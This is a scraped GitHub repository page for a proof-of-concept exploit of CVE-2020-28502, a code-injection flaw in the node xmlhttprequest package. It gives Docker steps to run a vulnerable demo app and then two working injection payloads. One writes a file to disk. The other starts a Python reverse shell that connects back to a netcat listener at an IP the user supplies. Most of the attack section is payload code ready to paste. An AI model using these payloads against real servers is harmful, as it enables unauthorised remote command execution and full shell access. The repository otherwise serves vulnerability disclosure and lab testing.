Skip to content

s-index/CVE-2020-28502

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
html
html
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
app.js
app.js
 
 
package-lock.json
package-lock.json
 
 
package.json
package.json
 
 

Repository files navigation

CVE-2020-28502 node-XMLHttpRequest RCE

NVD Description

This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.

Demo

cve-2020-28502

Set Up

  1. Build an image from a Dockerfile
$ docker build -t cve-2020-28502 .
  1. Run node app.js in a new container
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. Access http://localhost:3000

localhost-image

PoC Payload

Add file

Submit Payload

\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Reverse Shell

  1. Listen client
$ nc -l 8888
  1. Submit Payload

change ip address (192.168.0.25) to your local ip address

\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Reference

About

CVE-2020-28502 node-XMLHttpRequest RCE

Topics

xmlhttprequest poc rce cve-2020-28502

Resources

Readme
Activity

Stars

5 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages